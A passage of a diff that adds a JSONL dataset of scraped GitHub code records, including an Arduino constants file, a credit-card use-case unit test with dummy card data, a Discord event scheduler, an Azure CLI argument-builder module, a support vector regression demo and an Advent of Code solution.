diff --git "a/293.jsonl" "b/293.jsonl"
new file mode 100644
--- /dev/null
+++ "b/293.jsonl"
@@ -0,0 +1,2271 @@
+{"seq_id":"12421809764","text":"from os import environ\nDEBUG = environ.get('DEBUG', False)\n\nARDUINO_DEV_PATH = environ.get('DBX_ARDUINO_DEV', \"/dev/ttyACM0\")\nARDUINO_BAUD_RATE = environ.get('DBX_ARDUINO_BAUD', 9600)\n\nCMD_SET_LED = \"set_led\"\nCMD_SET_TEXT = \"set_text\"\nCMD_PARTY_LEDS = \"party_leds\"\n\n# List of command names (and formats for their associated arguments). These must\n# be in the same order as in the sketch.\nCOMMANDS = [[CMD_SET_LED, \"IIIII\"],\n [CMD_SET_TEXT, \"Is\"],\n [CMD_PARTY_LEDS, \"\"]]\n\n\nWHITE_RGB = [255, 255, 255]\nBLACK_RGB = [0, 0, 0]\nDBX_BLUE_RGB = [0, 97, 255]\nAVAILABLE_RGB = [0, 128, 0]\nFLOW_RGB = DBX_BLUE_RGB\nMAX_BRIGHTNESS = 255\n\nNUM_LED = 22\n","repo_name":"michaelprobinette/dbx-status-cube","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11223495553","text":"import unittest\n\nfrom unittest.mock import AsyncMock\nfrom src.domain.use_cases.create_new_creditcard_use_case import CreateNewCreditCardUseCase, CreateNewCreditCardDTOOut\nfrom src.domain.use_cases.dtos.creditcard_dtos import CreateNewCreditCardDTOIn\nfrom src.domain.factories.creditcard_factory import CreditCardFactory\nfrom src.domain.ports.outbound.protocol_repositories.creditcard_repository import ICreditCardRepository\n\n\nclass TestCreateNewCreditCardUseCase(unittest.TestCase):\n def setUp(self):\n # Create a mock for the repository\n self.mock_repository = AsyncMock(spec=ICreditCardRepository)\n\n # Create a use case instance with the mock repository\n self.use_case = CreateNewCreditCardUseCase(rep=self.mock_repository)\n self.input_data = CreateNewCreditCardDTOIn(\n exp_date=\"02/2026\",\n holder=\"Fulano\",\n number=\"4539578763621486\",\n cvv=\"123\"\n )\n self.output_date = CreateNewCreditCardDTOOut(\n identification=\"12313\",\n exp_date='2026-02-28',\n holder='FULANO',\n number='gAAA',\n cvv=123,\n brand=\"visa\"\n )\n self.credit_card = CreditCardFactory().create(self.input_data)\n self.mock_repository.create.return_value = self.credit_card\n\n async def test_create_new_credit_card(self):\n result = await self.use_case.create(self.input_data)\n self.output_date.identification = result.identification\n self.output_date.number = result.number\n self.assertEqual(result, self.output_date)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"GuiCastroo/CreditCardMaisTodos","sub_path":"src/tests/unittests/test_use_cases/test_create_new_credit_card_use_case.py","file_name":"test_create_new_credit_card_use_case.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38724089161","text":"import asyncio\nfrom functools import wraps\nfrom typing import List, Dict, Callable\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom threading import Timer, RLock\nfrom api.dbmodels.event import Event\nfrom usermanager import UserManager\nimport utils\nimport logging\nfrom api.database import db\nimport discord\n\n\n@dataclass\nclass FutureCallback:\n time: datetime\n callback: Callable\n\n\nclass EventManager:\n\n def __init__(self, discord_client: discord.Client):\n self._scheduled: List[FutureCallback] = []\n self._schedule_lock = RLock()\n self._cur_timer = None\n self._user_manager = UserManager()\n self._dc_client = discord_client\n\n def initialize_events(self):\n events = Event.query.all()\n for event in events:\n self.register(event)\n\n def register(self, event: Event):\n event_callbacks = [\n (event.start, lambda: self._event_start(event)),\n (event.end, lambda: self._event_end(event)),\n (event.registration_start, lambda: self._event_registration_start(event)),\n (event.registration_end, lambda: self._event_registration_end(event))\n ]\n now = datetime.now()\n for time, callback in event_callbacks:\n if time > now:\n self._schedule(\n FutureCallback(\n time=time,\n callback=self._wrap_async(callback)\n )\n )\n\n def _get_event_channel(self, event: Event) -> discord.TextChannel:\n guild = self._dc_client.get_guild(event.guild_id)\n return guild.get_channel(event.channel_id)\n\n async def _event_start(self, event: Event):\n self._user_manager.synch_workers()\n await self._get_event_channel(event).send(content=f'Event **{event.name}** just started!',\n embed=event.get_discord_embed(dc_client=self._dc_client, registrations=True))\n\n async def _event_end(self, event: Event):\n await self._get_event_channel(event).send(\n content=f'Event **{event.name}** just ended! 
Final standings:',\n embed=await event.create_leaderboard(self._dc_client)\n )\n\n complete_history = await event.create_complete_history(dc_client=self._dc_client)\n await self._get_event_channel(event).send(\n embed=event.get_summary_embed(dc_client=self._dc_client).set_image(url=f'attachment://{complete_history.filename}'),\n file=complete_history\n )\n\n self._user_manager.synch_workers()\n\n async def _event_registration_start(self, event: Event):\n await self._get_event_channel(event).send(content=f'Registration period for **{event.name}** has started!')\n\n async def _event_registration_end(self, event: Event):\n await self._get_event_channel(event).send(content=f'Registration period for **{event.name}** has ended!')\n\n def _wrap_async(self, coro):\n @wraps(coro)\n def func():\n self._dc_client.loop.create_task(coro())\n return func\n\n def _schedule(self, callback: FutureCallback):\n with self._schedule_lock:\n self._scheduled.append(callback)\n if len(self._scheduled) == 1:\n self._cur_timer = asyncio.create_task(self._execute())\n else:\n # Execution has to be restarted if the callback to schedule happens before the current waiting callback\n if callback.time < self._scheduled[0].time:\n self._cur_timer.cancel()\n self._scheduled.sort(key=lambda x: x.time)\n self._cur_timer = asyncio.create_task(self._execute())\n else:\n self._scheduled.sort(key=lambda x: x.time)\n\n async def _execute(self):\n while len(self._scheduled) > 0:\n cur_event = self._scheduled[0]\n diff_seconds = (cur_event.time - datetime.now()).total_seconds()\n await asyncio.sleep(diff_seconds)\n\n try:\n cur_event.callback()\n except Exception as e:\n logging.error(f'Unhandled exception during event callback {cur_event.callback}: {e}')\n if cur_event in self._scheduled:\n self._scheduled.remove(cur_event)\n","repo_name":"jackstar12/balance-bot","sub_path":"eventmanager.py","file_name":"eventmanager.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"40172664750","text":"import re\n\nimport inflect\nfrom utils.case import to_camel_case\n\nfrom ._arg import CMDArg, CMDArgBase, CMDArgumentHelp, CMDArgEnum, CMDArgDefault, CMDBooleanArgBase, \\\n CMDArgBlank, CMDObjectArgAdditionalProperties, CMDResourceLocationArgBase, CMDClsArgBase, CMDPasswordArgPromptInput\nfrom ._format import CMDFormat\nfrom ._schema import CMDObjectSchema, CMDSchema, CMDSchemaBase, CMDObjectSchemaBase, CMDObjectSchemaDiscriminator, \\\n CMDArraySchemaBase, CMDObjectSchemaAdditionalProperties, CMDResourceIdSchema, CMDBooleanSchemaBase, \\\n CMDResourceLocationSchemaBase, CMDPasswordSchema\n\n\nclass CMDArgBuilder:\n _inflect_engine = inflect.engine()\n\n @classmethod\n def new_builder(cls, schema, parent=None, var_prefix=None, ref_args=None, ref_arg=None, is_update_action=False):\n if var_prefix is None:\n if parent is None or parent._arg_var is None:\n arg_var = \"$\"\n else:\n arg_var = parent._arg_var\n else:\n arg_var = var_prefix\n\n if parent is None or parent._arg_var is None:\n if isinstance(schema, CMDSchema):\n if not arg_var.endswith(\"$\") and not schema.name.startswith('[') and not schema.name.startswith('{'):\n arg_var += '.'\n arg_var += f'{schema.name}'.replace('$', '') # some schema name may contain $\n else:\n raise NotImplementedError()\n else:\n assert isinstance(parent, CMDArgBuilder)\n if isinstance(parent.schema, CMDArraySchemaBase):\n arg_var += '[]'\n elif isinstance(parent.schema, CMDObjectSchemaAdditionalProperties):\n arg_var += '{}'\n elif isinstance(parent.schema, (CMDObjectSchemaBase, CMDObjectSchemaDiscriminator)):\n if not isinstance(schema, CMDObjectSchemaAdditionalProperties):\n if not arg_var.endswith(\"$\"):\n arg_var += '.'\n if isinstance(schema, CMDObjectSchemaDiscriminator):\n arg_var += schema.get_safe_value()\n elif isinstance(schema, CMDSchema):\n arg_var += f'{schema.name}'.replace('$', '') # some schema name may contain $\n else:\n raise NotImplementedError()\n else:\n raise NotImplementedError()\n cls_name = getattr(parent.schema, 'cls', None)\n if cls_name is not None:\n arg_var = arg_var.replace(parent._arg_var, f\"@{cls_name}\")\n\n if ref_arg:\n assert ref_args is None\n\n flatten = None\n sub_ref_args = []\n if not ref_arg and ref_args:\n for arg in ref_args:\n if arg.var == arg_var:\n ref_arg = arg\n flatten = False\n break\n elif arg.var.startswith(f\"{arg_var}.\"):\n flatten = True # this argument already flattened\n sub_ref_args.append(arg)\n sub_ref_args = sub_ref_args or None\n return cls(schema=schema, arg_var=arg_var, ref_arg=ref_arg, sub_ref_args=sub_ref_args, parent=parent, is_update_action=is_update_action, flatten=flatten)\n\n def __init__(self, schema, arg_var, ref_arg, sub_ref_args, parent=None, is_update_action=False, flatten=None):\n self.schema = schema\n self._parent = parent\n self._arg_var = arg_var\n self._ref_arg = ref_arg\n self._sub_ref_args = sub_ref_args\n self._flatten = flatten\n self._flatten_discriminators = False # flatten it's discriminators or not\n self._is_update_action = is_update_action\n\n def get_sub_builder(self, schema, ref_args=None, ref_arg=None):\n return self.new_builder(\n schema=schema, parent=self, ref_args=ref_args, ref_arg=ref_arg, is_update_action=self._is_update_action)\n\n def _ignore(self):\n if self.schema.frozen:\n return True\n if isinstance(self.schema, CMDSchemaBase):\n assert not self.schema.read_only\n if self.schema.const:\n return True\n return False\n\n def _build_arg_base(self):\n if self._ignore():\n return None\n arg_cls = 
self.schema.ARG_TYPE\n assert issubclass(arg_cls, (CMDArgBase, CMDObjectArgAdditionalProperties))\n return arg_cls.build_arg_base(self)\n\n def _build_arg(self):\n if self._ignore():\n return None\n\n arg_cls = self.schema.ARG_TYPE\n assert issubclass(arg_cls, CMDArg)\n return arg_cls.build_arg(self)\n\n def _need_flatten(self):\n if isinstance(self.schema, CMDObjectSchema):\n if self.get_cls():\n # not support to flatten object which is a cls.\n return False\n if self._flatten is not None:\n return self._flatten\n if self.schema.client_flatten:\n return True\n if self.schema.name == \"properties\" and self.schema.props:\n # flatten 'properties' property by default if it has props\n return True\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n return self._parent._flatten_discriminators\n return False\n\n def get_args(self):\n if self._ignore():\n return []\n\n arg = self._build_arg()\n assert arg is not None\n if self._need_flatten():\n if isinstance(self.schema, CMDSchema):\n self.schema.arg = None\n if arg.args:\n for sub_arg in arg.args:\n if sub_arg.group is None:\n sub_arg.group = to_camel_case(self.schema.name)\n if not arg.required:\n sub_arg.required = False\n return arg.args or []\n elif isinstance(self.schema, CMDSchema):\n self.schema.arg = arg.var\n arg.ref_schema = self.schema\n\n return [arg, ]\n\n def get_sub_args(self):\n assert isinstance(self.schema, (CMDObjectSchemaBase, CMDObjectSchemaDiscriminator))\n sub_args = []\n discriminator_mapping = {}\n if self._ref_arg:\n if isinstance(self._ref_arg, CMDClsArgBase):\n # use the linked instance\n unwrapped_ref_arg = self._ref_arg.get_unwrapped()\n assert unwrapped_ref_arg is not None\n sub_ref_args = unwrapped_ref_arg.args\n else:\n sub_ref_args = self._ref_arg.args\n else:\n sub_ref_args = self._sub_ref_args\n\n if self.schema.discriminators:\n # update self._flatten_discriminators, if any discriminator need flatten, then all discriminator needs to flatten\n for disc in self.schema.discriminators:\n sub_builder = self.get_sub_builder(schema=disc, ref_args=sub_ref_args)\n self._flatten_discriminators = self._flatten_discriminators or sub_builder._need_flatten()\n for disc in self.schema.discriminators:\n sub_builder = self.get_sub_builder(schema=disc, ref_args=sub_ref_args)\n results = sub_builder.get_args()\n sub_args.extend(results)\n if results and not self._flatten_discriminators:\n assert len(results) == 1\n if disc.property not in discriminator_mapping:\n discriminator_mapping[disc.property] = {}\n discriminator_mapping[disc.property][disc.value] = results[0].var\n\n if self.schema.props:\n for prop in self.schema.props:\n if prop.name in discriminator_mapping:\n # If discriminators are not flattened then prop value can be associate with discriminator arguments\n assert hasattr(prop, 'enum')\n for item in prop.enum.items:\n if item.value in discriminator_mapping[prop.name]:\n item.arg = discriminator_mapping[prop.name][item.value]\n continue\n sub_builder = self.get_sub_builder(schema=prop, ref_args=sub_ref_args)\n sub_args.extend(sub_builder.get_args())\n\n if not sub_args:\n return None\n return sub_args\n\n def get_sub_item(self):\n if hasattr(self.schema, \"item\") and self.schema.item:\n sub_ref_arg = self._ref_arg.item if self._ref_arg else None\n sub_builder = self.get_sub_builder(schema=self.schema.item, ref_arg=sub_ref_arg)\n return sub_builder._build_arg_base()\n else:\n return None\n\n def get_any_type(self):\n if hasattr(self.schema, \"any_type\") and self.schema.any_type and self.get_sub_item() 
is None:\n return True\n else:\n return False\n\n def get_additional_props(self):\n if hasattr(self.schema, \"additional_props\") and self.schema.additional_props:\n sub_ref_arg = self._ref_arg.additional_props if self._ref_arg else None\n sub_builder = self.get_sub_builder(schema=self.schema.additional_props, ref_arg=sub_ref_arg)\n return sub_builder._build_arg_base()\n else:\n return None\n\n def get_required(self):\n if not self._is_update_action and isinstance(self.schema, CMDSchema):\n return self.schema.required\n return False\n\n def get_nullable(self):\n if isinstance(self.schema, CMDSchemaBase) and self.schema.nullable:\n return True\n\n if isinstance(self.schema, CMDSchema):\n # when updated and schema is not required then nullable is true.\n # This can help update command to remove properties\n if not self.schema.required and self._is_update_action:\n return True\n\n elif isinstance(self.schema, CMDSchemaBase):\n # when updated and the element is nullable\n # This can help update command to remove elements.\n if self._is_update_action:\n return True\n\n return False\n\n def get_default(self):\n if self._ref_arg:\n # ref_arg already has default value return it\n if self._ref_arg.default:\n return CMDArgDefault(raw_data=self._ref_arg.default.to_native())\n if self._is_update_action:\n # ignore default for update actions\n return None\n if hasattr(self.schema, 'default') and self.schema.default:\n return CMDArgDefault.build_default(self, self.schema.default)\n return None\n\n def get_configuration_key(self):\n if self._ref_arg:\n return self._ref_arg.configuration_key\n return None\n\n def get_prompt(self):\n if self._ref_arg:\n # ref_arg already has prompt return it\n if hasattr(self._ref_arg, \"prompt\") and self._ref_arg.prompt:\n return self._ref_arg.prompt.__class__(raw_data=self._ref_arg.prompt.to_native())\n if isinstance(self.schema, CMDPasswordSchema):\n return CMDPasswordArgPromptInput(raw_data={\"msg\": \"Password:\"})\n return None\n\n def get_blank(self):\n if self.get_prompt() is not None:\n # disable blank when get prompt is available\n return None\n\n if self._ref_arg:\n if self._ref_arg.blank:\n return CMDArgBlank(raw_data=self._ref_arg.blank.to_native())\n return None # ignore the logic from schema\n\n if isinstance(self.schema, CMDBooleanArgBase):\n blk = CMDArgBlank()\n blk.value = True\n return blk\n return None\n\n def get_hide(self):\n if self._ref_arg:\n return self._ref_arg.hide # ignore the logic from schema\n\n if getattr(self.schema, 'name', None) == 'id' and not self.get_required() and self._parent and \\\n isinstance(self.schema, CMDResourceIdSchema):\n if self._arg_var.split('.', maxsplit=1)[-1] == 'id':\n # hide top level 'id' property when it has 'name' property,\n for prop in self._parent.schema.props:\n if prop.name == 'name':\n return True\n return False\n\n def get_var(self):\n return self._arg_var\n\n @staticmethod\n def _build_option_name(name):\n name = name.replace('_', '-')\n name = re.sub('(.)([A-Z][a-z]+)', r'\\1-\\2', name)\n name = re.sub('([a-z0-9])([A-Z])', r'\\1-\\2', name).lower()\n return '-'.join([p for p in name.split('-') if p])\n\n def get_options(self):\n if self._ref_arg:\n return [*self._ref_arg.options]\n\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n opt_name = self._build_option_name(self.schema.get_safe_value())\n elif isinstance(self.schema, CMDSchema):\n name = self.schema.name.replace('$', '')\n if name == \"[Index]\" or name == \"{Key}\":\n assert self._arg_var.endswith(name)\n prefix = 
self._arg_var[:-len(name)].split('.')[-1]\n prefix = self._inflect_engine.singular_noun(prefix)\n if name == \"[Index]\":\n name = f'{prefix}-index'\n elif name == \"{Key}\":\n name = f'{prefix}-key'\n elif name.startswith('[].') or name.startswith('{}.'):\n assert self._arg_var.endswith(name)\n prefix = self._arg_var[:-len(name)].split('.')[-1]\n prefix = self._inflect_engine.singular_noun(prefix)\n name = prefix + name[2:]\n name = name.replace('.', '-')\n opt_name = self._build_option_name(name) # some schema name may contain $\n else:\n raise NotImplementedError()\n return [opt_name, ]\n\n def get_singular_options(self):\n if self._ref_arg:\n singular_options = getattr(self._ref_arg, 'singular_options', None)\n if singular_options:\n return [*singular_options]\n\n # Disable singular options by default\n # if isinstance(self.schema, CMDArraySchema):\n # opt_name = self._build_option_name(self.schema.name.replace('$', '')) # some schema name may contain $\n # singular_opt_name = self._inflect_engine.singular_noun(opt_name) or opt_name\n # if singular_opt_name != opt_name:\n # return [singular_opt_name, ]\n return None\n\n def get_help(self):\n if self._ref_arg:\n if self._ref_arg.help:\n return CMDArgumentHelp(raw_data=self._ref_arg.help.to_native())\n\n if hasattr(self.schema, 'description') and self.schema.description:\n h = CMDArgumentHelp()\n h.short = self.schema.description.replace('\\n', ' ')\n return h\n return None\n\n def get_group(self):\n if self._ref_arg:\n return self._ref_arg.group\n return None\n\n def get_fmt(self):\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n return None\n assert hasattr(self.schema, 'fmt')\n if self.schema.fmt:\n assert isinstance(self.schema.fmt, CMDFormat)\n ref_fmt = getattr(self._ref_arg, 'fmt', None) if self._ref_arg else None\n return self.schema.fmt.build_arg_fmt(self, ref_fmt=ref_fmt)\n return None\n\n def get_enum(self):\n assert hasattr(self.schema, 'enum')\n if self.schema.enum:\n ref_enum = self._ref_arg.enum if self._ref_arg else None\n enum = CMDArgEnum.build_enum(self.schema.enum, ref_enum=ref_enum)\n return enum\n return None\n\n def get_cls(self):\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n return None\n assert hasattr(self.schema, 'cls')\n return self.schema.cls\n\n def get_type(self):\n return self.schema._get_type()\n\n def get_reverse_boolean(self):\n assert isinstance(self.schema, CMDBooleanSchemaBase)\n if self._ref_arg and isinstance(self._ref_arg, CMDBooleanArgBase):\n return self._ref_arg.reverse\n return False\n\n def get_resource_location_no_rg_default(self):\n assert isinstance(self.schema, CMDResourceLocationSchemaBase)\n if self._ref_arg and isinstance(self._ref_arg, CMDResourceLocationArgBase):\n return self._ref_arg.no_rg_default\n return False\n","repo_name":"Azure/aaz-dev-tools","sub_path":"src/aaz_dev/command/model/configuration/_arg_builder.py","file_name":"_arg_builder.py","file_ext":"py","file_size_in_byte":16496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"}
+{"seq_id":"13219825166","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Hiromasa Kaneko\n\"\"\"\n# Demonstration of Variable Importance-considering Support Vector Regression (VI-SVR) \n\nimport math\n\nimport matplotlib.figure as figure\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_boston\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import GridSearchCV, train_test_split, cross_val_predict\n\nfrom scipy.spatial.distance import cdist\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nrate_of_test_samples = 0.25 # rate of the number of test samples\nfold_number = 5 # fold number in cross-validation (CV)\nnonlinear_svr_cs = 2 ** np.arange(-5, 10, dtype=float) # C for nonlinear svr\nnonlinear_svr_epsilons = 2 ** np.arange(-10, 0, dtype=float) # Epsilon for nonlinear svr\nnonlinear_svr_gammas = 2 ** np.arange(-20, 10, dtype=float) # Gamma for nonlinear svr\nrandom_forest_number_of_trees = 500 # Number of decision trees for random forest\nrandom_forest_x_variables_rates = np.arange(1, 10, dtype=float) / 10 # Ratio of the number of X-variables for random forest\nweights_of_feature_importances = list(np.arange(0, 3.1, 0.1)) # p in VI-SVR\n\nx, y = load_boston(return_X_y=True)\nx = pd.DataFrame(x)\ny = pd.Series(y)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=rate_of_test_samples, shuffle=True)\n \n# autoscaling\nautoscaled_x_train = (x_train - x_train.mean(axis=0)) / x_train.std(axis=0, ddof=1)\nautoscaled_y_train = (y_train - y_train.mean()) / y_train.std(ddof=1)\nautoscaled_x_test = (x_test - x_train.mean(axis=0)) / x_train.std(axis=0, ddof=1)\n \n# VI-SVR\nrmse_oob_all = []\nfor random_forest_x_variables_rate in random_forest_x_variables_rates:\n RandomForestResult = RandomForestRegressor(n_estimators=random_forest_number_of_trees, max_features=int(\n max(math.ceil(x_train.shape[1] * random_forest_x_variables_rate), 1)), oob_score=True)\n RandomForestResult.fit(autoscaled_x_train, autoscaled_y_train)\n estimated_y_in_cv = RandomForestResult.oob_prediction_\n estimated_y_in_cv = estimated_y_in_cv * y_train.std(ddof=1) + y_train.mean()\n rmse_oob_all.append((sum((y_train - estimated_y_in_cv) ** 2) / len(y_train)) ** 0.5)\noptimal_random_forest_x_variables_rate = random_forest_x_variables_rates[\n np.where(rmse_oob_all == np.min(rmse_oob_all))[0][0]]\nregression_model = RandomForestRegressor(n_estimators=random_forest_number_of_trees, max_features=int(\n max(math.ceil(x_train.shape[1] * optimal_random_forest_x_variables_rate), 1)), oob_score=True)\nregression_model.fit(autoscaled_x_train, autoscaled_y_train)\nfeature_importances = pd.DataFrame(regression_model.feature_importances_ / max(regression_model.feature_importances_), index=x_train.columns)\n\nautoscaled_x_train_original = autoscaled_x_train.copy()\nr2cvs = []\nfor weight in weights_of_feature_importances:\n autoscaled_x_train = autoscaled_x_train_original * (feature_importances.iloc[:, 0] ** weight)\n # svr\n variance_of_gram_matrix = []\n numpy_autoscaled_x_train = np.array(autoscaled_x_train)\n for nonlinear_svr_gamma in nonlinear_svr_gammas:\n gram_matrix = np.exp(-nonlinear_svr_gamma * cdist(numpy_autoscaled_x_train, numpy_autoscaled_x_train, metric='sqeuclidean'))\n variance_of_gram_matrix.append(gram_matrix.var(ddof=1))\n optimal_nonlinear_gamma = nonlinear_svr_gammas[\n np.where(variance_of_gram_matrix == np.max(variance_of_gram_matrix))[0][0]]\n # optimize ε with CV\n 
model_in_cv = GridSearchCV(svm.SVR(kernel='rbf', C=3, gamma=optimal_nonlinear_gamma), {'epsilon': nonlinear_svr_epsilons},\n cv=fold_number, verbose=0)\n model_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\n optimal_nonlinear_epsilon = model_in_cv.best_params_['epsilon']\n # optimize C with CV\n model_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, gamma=optimal_nonlinear_gamma),\n {'C': nonlinear_svr_cs}, cv=fold_number, verbose=0)\n model_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\n optimal_nonlinear_c = model_in_cv.best_params_['C']\n # optimize γ with CV\n model_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, C=optimal_nonlinear_c),\n {'gamma': nonlinear_svr_gammas}, cv=fold_number, verbose=0)\n model_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\n optimal_nonlinear_gamma = model_in_cv.best_params_['gamma']\n regression_model = svm.SVR(kernel='rbf', C=optimal_nonlinear_c, epsilon=optimal_nonlinear_epsilon,\n gamma=optimal_nonlinear_gamma)\n regression_model.fit(autoscaled_x_train, autoscaled_y_train)\n estimated_y_in_cv = np.ndarray.flatten(\n cross_val_predict(regression_model, autoscaled_x_train, autoscaled_y_train, cv=fold_number))\n r2cvs.append(float(1 - sum((autoscaled_y_train - estimated_y_in_cv) ** 2) / sum((autoscaled_y_train - autoscaled_y_train.mean()) ** 2)))\n \noptimal_weight = weights_of_feature_importances[np.where(r2cvs == np.max(r2cvs))[0][0]]\nprint(optimal_weight)\nautoscaled_x_train = autoscaled_x_train_original * (feature_importances.iloc[:, 0] ** optimal_weight)\nautoscaled_x_test = autoscaled_x_test * (feature_importances.iloc[:, 0] ** optimal_weight)\n# svr\nvariance_of_gram_matrix = list()\nnumpy_autoscaled_x_train = np.array(autoscaled_x_train)\nfor nonlinear_svr_gamma in nonlinear_svr_gammas:\n gram_matrix = np.exp(-nonlinear_svr_gamma * cdist(numpy_autoscaled_x_train, numpy_autoscaled_x_train, metric='sqeuclidean'))\n variance_of_gram_matrix.append(gram_matrix.var(ddof=1))\noptimal_nonlinear_gamma = nonlinear_svr_gammas[\n np.where(variance_of_gram_matrix == np.max(variance_of_gram_matrix))[0][0]]\n# optimize ε with CV\nmodel_in_cv = GridSearchCV(svm.SVR(kernel='rbf', C=3, gamma=optimal_nonlinear_gamma), {'epsilon': nonlinear_svr_epsilons},\n cv=fold_number, verbose=0)\nmodel_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\noptimal_nonlinear_epsilon = model_in_cv.best_params_['epsilon']\n# optimize C with CV\nmodel_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, gamma=optimal_nonlinear_gamma),\n {'C': nonlinear_svr_cs}, cv=fold_number, verbose=0)\nmodel_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\noptimal_nonlinear_c = model_in_cv.best_params_['C']\n# optimize γ with CV\nmodel_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, C=optimal_nonlinear_c),\n {'gamma': nonlinear_svr_gammas}, cv=fold_number, verbose=0)\nmodel_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\noptimal_nonlinear_gamma = model_in_cv.best_params_['gamma']\nregression_model = svm.SVR(kernel='rbf', C=optimal_nonlinear_c, epsilon=optimal_nonlinear_epsilon,\n gamma=optimal_nonlinear_gamma)\nregression_model.fit(autoscaled_x_train, autoscaled_y_train)\n\n# calculate y\ncalculated_y_train = np.ndarray.flatten(regression_model.predict(autoscaled_x_train))\ncalculated_y_train = calculated_y_train * y_train.std(ddof=1) + y_train.mean()\n# r2, RMSE, MAE\nprint('r2: {0}'.format(float(1 - sum((y_train - calculated_y_train) ** 2) / sum((y_train - 
y_train.mean()) ** 2))))\nprint('RMSE: {0}'.format(float((sum((y_train - calculated_y_train) ** 2) / len(y_train)) ** 0.5)))\nprint('MAE: {0}'.format(float(sum(abs(y_train - calculated_y_train)) / len(y_train))))\n# yy-plot\nplt.figure(figsize=figure.figaspect(1))\nplt.scatter(y_train, calculated_y_train)\ny_max = np.max(np.array([np.array(y_train), calculated_y_train]))\ny_min = np.min(np.array([np.array(y_train), calculated_y_train]))\nplt.plot([y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)],\n [y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)], 'k-')\nplt.ylim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlabel('Actual Y')\nplt.ylabel('Calculated Y')\nplt.show()\n\n# prediction\npredicted_y_test = np.ndarray.flatten(regression_model.predict(autoscaled_x_test))\npredicted_y_test = predicted_y_test * y_train.std(ddof=1) + y_train.mean()\n# yy-plot\nplt.figure(figsize=figure.figaspect(1))\nplt.scatter(y_test, predicted_y_test)\ny_max = np.max(np.array([np.array(y_test), predicted_y_test]))\ny_min = np.min(np.array([np.array(y_test), predicted_y_test]))\nplt.plot([y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)],\n [y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)], 'k-')\nplt.ylim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlabel('Actual Y')\nplt.ylabel('Predicted Y')\nplt.show()\n# r2p, RMSEp, MAEp\nprint('r2p: {0}'.format(float(1 - sum((y_test - predicted_y_test) ** 2) / sum((y_test - y_test.mean()) ** 2))))\nprint('RMSEp: {0}'.format(float((sum((y_test - predicted_y_test) ** 2) / len(y_test)) ** 0.5)))\nprint('MAEp: {0}'.format(float(sum(abs(y_test - predicted_y_test)) / len(y_test))))\n","repo_name":"hkaneko1985/dcekit","sub_path":"demo_visvr.py","file_name":"demo_visvr.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"}
+{"seq_id":"14969745487","text":"import math\nfrom pathlib import Path\n\ny = (1, 0, -1, 0)\nx = (0, 1, 0, -1)\n\ndirs = ('N', 'E', 'S', 'W')\ndirs_coord = dict(zip(dirs, zip(x, y)))\n\n\ndef part1(sequence):\n cx = cy = 0\n curr_dir = dirs.index('E')\n for action, value in sequence:\n if action in dirs_coord:\n dx, dy = dirs_coord[action]\n cx, cy = cx+(dx*value), cy+(dy*value)\n elif action == 'F':\n dx, dy = dirs_coord[dirs[curr_dir]]\n cx, cy = cx+(dx*value), cy+(dy*value)\n else:\n sign = 1 if action == 'R' else -1\n move = (value//90)\n curr_dir = (curr_dir+(sign*move)) % len(dirs)\n\n return abs(cx)+abs(cy)\n\n\ndef part2(sequence):\n\n def rotate(point, angle):\n angle = math.radians(angle)\n (px, py) = point\n px_ = px * math.cos(angle) - py * math.sin(angle)\n py_ = py * math.cos(angle) + px * math.sin(angle)\n return round(px_), round(py_)\n\n cx = cy = 0\n wx, wy = 10, 1\n\n for action, value in sequence:\n if action in dirs_coord:\n dx, dy = dirs_coord[action]\n wx, wy = wx+(dx*value), wy+(dy*value)\n elif action == 'F':\n cx, cy = cx+(wx*value), cy+(wy*value)\n else:\n sign = -1 if action == 'R' else 1\n wx, wy = rotate((wx, wy), sign*value)\n print(action+str(value), f'({cx},{cy})',\n f'({wx},{wy})')\n\n return abs(cx)+abs(cy)\n\n\ndef process_input(file):\n return [(x[0], int(x[1:])) for x in file.read().splitlines()]\n\n\nif __name__ == \"__main__\":\n script_path = 